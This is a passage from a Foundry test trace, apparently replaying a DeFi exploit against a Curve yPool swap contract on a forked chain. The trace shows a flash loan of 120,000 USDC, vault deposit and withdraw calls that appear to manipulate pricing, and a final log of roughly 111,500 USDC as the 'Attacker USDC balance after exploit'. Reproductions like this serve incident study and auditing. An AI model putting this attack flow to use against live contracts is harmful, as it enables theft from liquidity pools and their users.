    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [24953] USDT::approve(0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 71076010671 [7.107e10])
    │   │   │   │   ├─ emit Approval(owner: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], spender: 0x83f798e925BcD4017Eb265844FDDAbb448f1707D, value: 71076010671 [7.107e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x014341f4a36b9d5f4c53038524d6ecbddf8e24c3abaf7b3c58b01d3ca88c6432: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [68308] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::deposit(71076010671 [7.107e10])
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 984873323 [9.848e8]
    │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [5324] USDT::transferFrom(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 71076010671 [7.107e10])
    │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0x83f798e925BcD4017Eb265844FDDAbb448f1707D, value: 71076010671 [7.107e10])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0x000000000000000000000000000000000000000000000000000000108c75daaf → 0
    │   │   │   │   │   │   @ 0x014341f4a36b9d5f4c53038524d6ecbddf8e24c3abaf7b3c58b01d3ca88c6432: 0x000000000000000000000000000000000000000000000000000000108c75daaf → 0
    │   │   │   │   │   │   @ 0x59eeeba12578e687e664f3dd30fc04063e3d7d6d103f260d4ce00789662b3f9b: 0x000000000000000000000000000000000000000000000000000000003ab3f96b → 0x00000000000000000000000000000000000000000000000000000010c729d41a
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 72060883994 [7.206e10]
    │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 8903409269747759957784 [8.903e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 6: 43382 → 43383
    │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x00000000000000000000000000000000000000000000000032c5e296dd6eb800 → 0x0000000000000000000000000000000000000000000001e2da65c92410b67f18
    │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000006b01e6d58fd73c265 → 0x0000000000000000000000000000000000000000000001e957be53e630bb897d
    │   │   │   │   │   @ 0x59eeeba12578e687e664f3dd30fc04063e3d7d6d103f260d4ce00789662b3f9b: 0x000000000000000000000000000000000000000000000000000000003ab3f96b → 0x00000000000000000000000000000000000000000000000000000010c729d41a
    │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000000000003ab3f96b → 0x00000000000000000000000000000000000000000000000000000010c729d41a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [95099] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::withdraw(184047583437 [1.84e11])
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0x0000000000000000000000000000000000000000, value: 184047583437 [1.84e11])
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   ├─ [24717] USDC::transfer(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 231512390369 [2.315e11])
    │   │   │   │   │   ├─ [23928] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 231512390369 [2.315e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 231512390369 [2.315e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0 → 0x00000000000000000000000000000000000000000000000000000035e736bae1
    │   │   │   │   │   │   │   @ 0x6ef731fbf0ed529ff2260972828b4a34c086d48d87e805ffaf308a71f1851fa8: 0x000000000000000000000000000000000000000000000000000000542365496f → 0x0000000000000000000000000000000000000000000000000000001e3c2e8e8e
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 129858702990 [1.298e11]
    │   │   │   │   │   └─ ← [Return] 129858702990 [1.298e11]
    │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x0000000000000000000000000000000000000000000000000000004532894fc7 → 0x0000000000000000000000000000000000000000000000000000001a58720efa
    │   │   │   │   │   @ 6: 63453 → 63454
    │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0 → 0x00000000000000000000000000000000000000000000000000000035e736bae1
    │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000000000000000084bc3f9e13 → 0x00000000000000000000000000000000000000000000000000000059e2285d46
    │   │   │   │   │   @ 7: 0x000000000000000000000000000000000000000000000000000000a6f78ed8eb → 0x0000000000000000000000000000000000000000000000000000007110581e0a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1315] USDC::balanceOf(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 231512390369 [2.315e11]
    │   │   │   │   └─ ← [Return] 231512390369 [2.315e11]
    │   │   │   ├─ [24717] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 231512390369 [2.315e11])
    │   │   │   │   ├─ [23928] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 231512390369 [2.315e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 231512390369 [2.315e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000000000000035e736bae1
    │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0x00000000000000000000000000000000000000000000000000000035e736bae1 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit TokenExchangeUnderlying(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 2, param2: 71076010671 [7.107e10], param3: 1, param4: 231512390369 [2.315e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x014341f4a36b9d5f4c53038524d6ecbddf8e24c3abaf7b3c58b01d3ca88c6432: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5acf: 0x00000000000000000000000000000000000000000000000000000045327fa40c → 0x0000000000000000000000000000000000000000000000000000001a56367e87
    │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad0: 0x00000000000000000000000000000000000000000000000011b664a7ed737f58 → 0x0000000000000000000000000000000000000000000001e2b958b69529896389
    │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x00000000000000000000000000000000000000000000000032c5e296dd6eb800 → 0x0000000000000000000000000000000000000000000001e2da65c92410b67f18
    │   │   │   │   @ 7: 0x000000000000000000000000000000000000000000000000000000a6f78ed8eb → 0x0000000000000000000000000000000000000000000000000000007110581e0a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [4817] USDC::transfer(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168, 120012000000 [1.2e11])
    │   │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168, 120012000000 [1.2e11]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168, value: 120012000000 [1.2e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4dd1725f464fafcddf286deb01aabcbb4bf8a538bad59c775b5dcdb2fbc3c71a: 0x00000000000000000000000000000000000000000000000000002f64816d08b2 → 0x00000000000000000000000000000000000000000000000000002f8072b2d3b2
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000000000000035e736bae1 → 0x00000000000000000000000000000000000000000000000000000019f5f0efe1
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x9e8bec266495e94a23a2df3395e1d16c4856b7e0768a4d16c770a25e0c3aa503: 0x000000000000000000000000000000000000000000000000000000193c80f1e3 → 0x000000000000000000000000000000000000000000000000000000193f5413d2
    │   │   │   @ 0x0000000000000000000000000000000000000000000000000000000000ffffff: 1 → 0
    │   │   └─ ← [Stop]
    │   ├─ [602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [staticcall]
    │   │   └─ ← [Return] 55714108890776239216744060 [5.571e25]
    │   ├─ [1315] USDC::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [delegatecall]
    │   │   │   └─ ← [Return] 52228726641586 [5.222e13]
    │   │   └─ ← [Return] 52228726641586 [5.222e13]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 120000000000 [1.2e11], param4: 0, param5: 12000000 [1.2e7])
    │   ├─  storage changes:
    │   │   @ 2: 0x00000000000000000000000000000000000000005e374adf24daa09b4bcb0f1a → 0x00000000000000000000000000000000000000005e374c7b390f13114347abb3
    │   └─ ← [Stop]
    ├─ [1315] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 111500390369 [1.115e11]
    │   └─ ← [Return] 111500390369 [1.115e11]
    ├─ [3164] USDC::decimals() [staticcall]
    │   ├─ [2381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after exploit", val: 111500390369 [1.115e11], decimals: 6)
    ├─  storage changes:
    │   @ 0: 0x000000012c012c001cfbc89b0000000000000000000010c6f4e6e4e46b6121ff → 0x000100012c012c001cfbc89b0000000000000000000010c6f4e6e4e46b6121ff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 69.05s (67.65s CPU time)

Ran 2 test suites in 70.71s (70.48s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
